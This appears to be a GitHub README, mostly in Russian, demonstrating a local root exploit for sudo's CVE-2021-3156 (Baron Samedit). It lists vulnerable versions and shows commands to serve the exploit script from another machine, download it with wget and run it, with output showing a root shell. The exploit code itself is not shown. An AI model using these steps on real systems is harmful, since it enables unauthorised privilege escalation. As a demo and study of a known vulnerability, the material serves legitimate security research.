CVE-2021-3156-Exploit-Demo# 👑 CVE-2021-3156 (Baron Samedit) — Privilege Escalation via Heap Overflow in sudo
📅 **Дата:** 2025-06-08
✍️ **Автор:** [@TopskiyPavelQwertyGang](https://github.com/TopskiyPavelQwertyGang)
🧠 Security Researcher | Red Team Enthusiast
---
## 🧠 CVE Overview
- **CVE-ID:** CVE-2021-3156
- **Тип:** Heap-based Buffer Overflow
- **Компонент:** `sudoedit` (sudo)
- **Уровень доступа:** Local
- **Цель:** Получение root-привилегий
---
## 🧠 Описание
Heap-overflow в `sudoedit` даёт возможность локальному пользователю получить root-доступ
при выполнении команды `sudoedit` с заранее подготовленными параметрами.
Эксплуатация активна для версий `sudo` < 1.9.5p2, включая популярные образы Ubuntu/Debian/CentOS.
Даже при включённом ASLR уязвимость остаётся эксплуатируемой.
---
## 🐾 Условия эксплуатации
```bash
OS : Ubuntu 20.04.3 LTS
glibc : 2.31 (tcache ON)
sudo : 1.8.31 (уязвим)
ASLR : 2 (включён)
```
---
## 🧪 Подготовка окружения
1. Проверены версии `glibc` и `sudo`:
```bash
ldd --version
sudo --version
```
2. Переданы PoC-скрипты с другой машины через встроенный HTTP-сервер:
```bash
python3 -m http.server 80
```
3. На целевой машине PoC скачиваются и исполняются:
```bash
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py
```
---
## 🚀 Успешная эксплуатация Poс
```bash
$ python3 exploit_nss.py
# whoami
root
```
---
## 🧾 Заключение
Эксплуатация `CVE-2021-3156` остаётся возможной даже при активном ASLR, если `glibc` ≥ 2.26 и `sudo` уязвимой версии.
Наиболее стабильным оказался эксплойт `exploit_nss.py`, срабатывающий с первого раза при корректной конфигурации NSS.
🧨 **Система под контролем.**
---
[4.0K] /data/pocs/668d9b58eeb707885d96aa419ed2c563a1117364
├── [8.0K] exploit_nss.py
└── [2.3K] README.md
0 directories, 2 files